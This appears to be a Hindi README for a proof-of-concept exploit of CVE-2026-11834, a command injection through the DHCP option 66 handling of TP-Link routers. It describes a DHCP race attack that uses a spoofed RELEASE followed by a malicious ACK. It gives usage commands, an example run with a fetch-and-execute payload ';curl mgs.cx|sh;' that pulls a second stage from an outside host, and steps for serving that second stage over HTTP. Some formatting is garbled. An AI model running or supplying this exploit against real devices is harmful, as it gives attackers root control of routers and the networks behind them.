
TP-Link DHCP विकल्प 66 अनप्रमाणित RCE (CVE-2026-11834) के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC)
TP-Link DHCP विकल्प 66 अनधिकृत RCE (CVE-2026-11834)
TP-Link राउटर फर्मवेयर के DHCP विकल्प 66 ("TFTP सर्वर नाम") हैंडलिंग में एक कमांड इंजेक्शन भेद्यता (CWE-78) है, जो उसी नेटवर्क सेगमेंट पर एक अनधिकृत हमलावर को रूट के रूप में मनमानी कमांड निष्पादित करने की अनुमति देती है। जब डिवाइस अपने WAN इंटरफ़ेस पर DHCP क्लाइंट के रूप में कार्य करता है, तो लीज़ में लौटाया गया विकल्प 66 मान libcmm.so के भीतर एक tftp शेल कमांड में बिना स्वच्छता के जोड़ दिया जाता है। पाँच फ़ंक्शन इस कमांड का निर्माण करते हैं और इसे util_execSystem() को पास करते हैं, जो system() को कॉल करता है, इसलिए एक रचित विकल्प 66 मान शेल इनपुट के रूप में व्याख्यायित होता है और रूट के रूप में निष्पादित होता है।
डिवाइस पर विकल्प 66 मान 16 अक्षरों में छोटा कर दिया जाता है, इसलिए पेलोड एक न्यूनतम फ़ेच-एंड-एक्ज़ीक्यूट (;curl <domain>|sh;) है जो HTTP पर एक बड़े दूसरे चरण को खींचता है।
हमलावर को DHCP सर्वर को नियंत्रित करने की आवश्यकता नहीं है। यह PoC सेगमेंट पर वैध सर्वर के साथ दौड़ लगाता है: यह लक्ष्य के बंधन को साफ़ करने के लिए एक नकली DHCP RELEASE भेजता है, लक्ष्य द्वारा अपना लीज़ प्राप्त करने की प्रतीक्षा करता है, फिर वैध सर्वर के उत्तर देने से पहले लक्ष्य के प्रसारण का उत्तर पेलोड ले जाने वाले एक दुर्भावनापूर्ण / से देता है।
OFFERACKयह प्रूफ़ ऑफ़ कॉन्सेप्ट (PoC) TP-Link Archer C20 V6 (फर्मवेयर 0.9.1 बिल्ड 4.19, EU) के विरुद्ध परीक्षण किया गया था। कमजोर कोड पथ TP-Link राउटर की एक श्रृंखला में साझा किया जाता है; मेमोरी ऑफसेट, फ़ंक्शन पते और व्यवहार अन्य मॉडलों या फर्मवेयर संस्करणों पर भिन्न हो सकते हैं।
यह PoC एक विकल्प 66 पेलोड वितरित करता है जो लक्ष्य डिवाइस पर रूट के रूप में निष्पादित होता है। इसे केवल उस हार्डवेयर के विरुद्ध चलाएं जो आपका अपना है या जिसके परीक्षण के लिए आप स्पष्ट रूप से अधिकृत हैं।
$ sudo python3 cve-2026-11834.py <target_ip> -i <interface> -s <dhcp_server_ip> -S <dhcp_server_mac> -p '<payload>'
| तर्क | विवरण |
|---|---|
target_ip | लक्ष्य डिवाइस का वर्तमान IP पता |
-i, --interface | लक्ष्य के सेगमेंट पर नेटवर्क इंटरफ़ेस |
-s, --server-ip | वैध DHCP सर्वर IP |
-S, --server-mac | वैध DHCP सर्वर MAC |
-p, --payload | विकल्प 66 मान (<=16 अक्षर), जैसे `;curl |
-t, --target-mac | लक्ष्य MAC (यदि छोड़ा गया तो ARP के माध्यम से स्वचालित रूप से हल किया जाता है) |
-a, --attacker-ip | दुर्भावनापूर्ण लीज़ में विज्ञापित सर्वर-आईडी (डिफ़ॉल्ट रूप से इंटरफ़ेस IP) |
उदाहरण रन:
$ sudo python3 cve-2026-11834.py 10.0.10.110 -i eth0 -s 10.0.10.254 -S 00:f2:8b:99:86:46 -p ';curl mgs.cx|sh;'
TP-Link DHCP Option 66 Unauthenticated RCE (CVE-2026-11834) - Race Attack
Target IP : 10.0.10.110
Target MAC : 3c:64:cf:7b:69:8b
DHCP Server : 10.0.10.254 (00:f2:8b:99:86:46)
Attacker IP : 10.0.10.5
Interface : eth0
Payload : ;curl mgs.cx|sh;
[*] Sending spoofed DHCP RELEASE for 10.0.10.110
[*] RELEASE sent. Waiting for target to re-acquire lease...
[!] Got DHCP REQUEST from 3c:64:cf:7b:69:8b, XID: 0x43edad72
[>] Sending malicious DHCP ACK...
[>] ACK sent. Payload delivered.
पेलोड होस्ट एक दूसरा चरण प्रदान करता है जिसे डिवाइस लाकर चलाता है। उदाहरण के लिए:
$ cat index.html
[second stage payload]
$ sudo python3 -m http.server 80